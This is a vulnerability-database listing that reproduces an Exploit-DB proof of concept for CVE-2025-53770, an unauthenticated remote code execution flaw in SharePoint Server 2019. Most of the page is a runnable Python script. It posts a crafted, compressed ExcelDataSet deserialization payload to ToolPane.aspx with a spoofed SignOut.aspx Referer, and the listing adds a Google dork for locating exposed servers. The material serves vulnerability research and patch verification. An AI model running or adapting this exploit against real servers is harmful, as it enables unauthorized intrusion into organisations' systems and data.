Microsoft SharePoint Server 2019 (16.0.10383.20020) - Remote Code Execution (RCE)

🗓️ 11 Aug 2025 00:00:00Reported by Agampreet SinghType

exploitdb🔗 www.exploit-db.com👁 389 Views

SharePoint Server 2019 remote code execution via ToolPane.aspx deserialization; CVE-2025-53770.

Reporter	Title	Published	Views	Family All 118
GithubExploit	Exploit for Deserialization of Untrusted Data in Microsoft	28 Jul 202522:41	–	githubexploit
GithubExploit	Exploit for Deserialization of Untrusted Data in Microsoft	25 Jul 202520:43	–	githubexploit
GithubExploit	Exploit for Deserialization of Untrusted Data in Microsoft	21 Jul 202518:43	–	githubexploit
GithubExploit	Exploit for Deserialization of Untrusted Data in Microsoft	27 Jul 202520:55	–	githubexploit
GithubExploit	Exploit for Deserialization of Untrusted Data in Microsoft	23 Sep 202519:05	–	githubexploit
GithubExploit	Exploit for Deserialization of Untrusted Data in Microsoft	26 Jul 202510:54	–	githubexploit
GithubExploit	Exploit for Deserialization of Untrusted Data in Microsoft	23 Jul 202521:02	–	githubexploit
GithubExploit	Exploit for Deserialization of Untrusted Data in Microsoft	22 Jul 202522:33	–	githubexploit
GithubExploit	Exploit for Deserialization of Untrusted Data in Microsoft	2 Aug 202508:00	–	githubexploit
GithubExploit	Exploit for Deserialization of Untrusted Data in Microsoft	24 Jul 202501:14	–	githubexploit

# Exploit Title: Microsoft SharePoint Server 2019 – Remote Code Execution (RCE)
# Google Dork: intitle:"Microsoft SharePoint" inurl:"/_layouts/15/ToolPane.aspx"
# Date: 2025-08-07
# Exploit Author: Agampreet Singh (RedRoot Tool Maker – https://github.com/Agampreet-Singh/RedRoot)
# Vendor Homepage: https://www.microsoft.com
# Software Link: https://www.microsoft.com/en-us/microsoft-365/sharepoint/collaboration
# Version: SharePoint Server 2019 (16.0.10383.20020)
# Tested on: Windows Server 2019 (x64)
# CVE: CVE-2025-53770

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

"""
Exploit Author: Agampreet Singh (RedRoot Tool Maker)
RedRoot Repository: https://github.com/Agampreet-Singh/RedRoot
This PoC demonstrates unauthenticated RCE by exploiting unsafe deserialization in SharePoint’s ToolPane.aspx via the Scorecard:ExcelDataSet control.
FOR EDUCATIONAL AND AUTHORIZED SECURITY TESTING PURPOSES ONLY.
"""

import requests
import base64
import gzip
import re
import sys

def exploit_sharepoint(target_url):
    print(f"[+] Target: {target_url}")

    headers = {
        "Referer": "/_layouts/SignOut.aspx",
        "Content-Type": "application/x-www-form-urlencoded"
    }

    payload = '''
<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>
<asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest">
  <ProgressTemplate>
    <div class="divWaiting">
      <Scorecard:ExcelDataSet CompressedDataTable="H4sIAADEfmgA/4WRX2uzMBTG7/0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9+PEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c+c1Umalp33/0/62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl+ftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S/VeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1+t/pbj+vyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA=" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet>
    </div>
  </ProgressTemplate>
</asp:UpdateProgress>
'''.strip()

    data = {
        "MSOTlPn_Uri": target_url,
        "MSOTlPn_DWP": payload
    }

    try:
        response = requests.post(
            f"{target_url}/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx",
            headers=headers,
            data=data,
            verify=False,
            timeout=10
        )

        if response.status_code != 200:
            print(f"[-] Unexpected HTTP response: {response.status_code}")
            return

        match = re.search(r'CompressedDataTable="([^&]+)', response.text)
        if not match:
            print("[-] No CompressedDataTable found in response.")
            return

        compressed_b64 = match.group(1)
        print("[+] Compressed payload extracted.")

        compressed_data = base64.b64decode(compressed_b64)
        decompressed_data = gzip.decompress(compressed_data)

        decoded_output = decompressed_data.decode('utf-8', errors='ignore')
        print("[+] Payload decoded successfully. Dumping to file...")

        output_file = "/tmp/sharepoint_decoded_payload.txt"
        with open(output_file, "w", encoding="utf-8") as f:
            f.write(decoded_output)

        print(f"[+] Saved to {output_file}")
        print("[*] Summary Matches:")
        for keyword in ["IntruderScannerDetectionPayload", "ExcelDataSet", "divWaiting", "ProgressTemplate", "Scorecard"]:
            if keyword in decoded_output:
                print(f"  - Found: {keyword}")

    except Exception as e:
        print(f"[!] Exploit failed: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 cve-2025-53770.py https://target.com")
        sys.exit(1)
    target = sys.argv[1].strip().rstrip('/')
    exploit_sharepoint(target)

11 Aug 2025 00:00Current

7.4High risk

Vulners AI Score7.4

CVSS 3.19.8

EPSS0.88536

SSVC